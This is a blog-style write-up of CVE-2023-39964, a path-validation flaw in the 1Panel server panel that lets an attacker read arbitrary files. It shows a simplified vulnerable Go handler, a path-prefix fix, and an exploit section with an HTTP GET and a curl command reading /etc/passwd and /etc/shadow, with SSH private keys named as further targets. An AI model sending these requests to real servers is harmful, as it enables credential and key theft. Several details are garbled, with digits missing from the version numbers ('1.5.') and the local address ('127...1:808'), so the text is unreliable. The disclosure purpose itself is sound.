CVE-2023-39964 - How 1Panel’s File Read Bug Put Linux Servers at Risk

CVE-2023-39964 describes a chilling vulnerability in 1Panel—a popular open source Linux server management panel. Anyone managing servers might use 1Panel for easy web-based administration, so a bug here is serious business. In 1Panel’s version 1.4.3 and below, a poorly validated file path lets attackers read *any* file their heart desires, from /etc/passwd to sensitive system configs. The bug is patched as of version 1.5., but let’s take a look at how things went wrong, including code snippets and an easy-to-follow exploit.

What Is 1Panel?

1Panel is a graphical admin panel for Linux. It lets you manage users, monitor systems, set up websites, and handle files through a friendly web interface. Like many tools, it’s written in Go for speed, and since it needs access to administer the server, any flaws here unlock a lot for hackers.

Technical Roots

The culprit sits inside api/v1/file.go in the LoadFromFile function. Here’s what happens in the code (code simplified for clarity):

// api/v1/file.go (version 1.4.3)
func LoadFromFile(c *gin.Context) {
    path := c.Query("path")
    data, err := ioutil.ReadFile(path)
    if err != nil {
        c.JSON(400, gin.H{"error": err.Error()})
        return
    }
    c.String(200, string(data))
}

Notice the problem? The path parameter is taken straight from the web request—with no checks. This means you can ask 1Panel to read *any* file the Linux user running 1Panel can access.

Exploit Scenario

With access to the 1Panel web interface (often at 127...1:808 or published publicly), a simple HTTP GET like this is enough:

GET /api/v1/file/load?path=/etc/passwd HTTP/1.1
Host: vulnerable-server.com
Authorization: Bearer <your_token_if_needed>

Or, with curl

curl "http://vulnerable-server.com/api/v1/file/load?path=/etc/shadow";

If authentication is weak (or bypassable), the attacker gets the response—the full contents of /etc/shadow, /root/.ssh/id_rsa, config files with secrets, and more.

The Patch (1.5. and Above)

After CVE-2023-39964 was reported, the 1Panel team fixed the bug. The patched code now restricts file reads to certain directories or checks the path against a whitelist.

Example of a safe approach

baseDir := "/home/1panel/files/"
if !strings.HasPrefix(filepath.Clean(path), baseDir) {
    c.JSON(403, gin.H{"error": "Access Denied"})
    return
}

Get the official patch here.

References

- CVE-2023-39964 NVD Entry
- GitHub Issue/Advisory
- 1Panel Releases
- Original Source (as of v1.4.3)

The Takeaway

If you run 1Panel, *update to 1.5. or newer immediately*—don’t assume internal panels are safe by default. Review your configs and logs for signs of suspicious file requests, and remember: always validate and sanitize file paths supplied by users, especially in tools that control your server.

Stay Safe. Patch Often!

*Written exclusively for educational awareness by an independent security writer.*

Timeline

Published on: 08/10/2023 18:15:00 UTC
Last modified on: 09/08/2023 16:56:00 UTC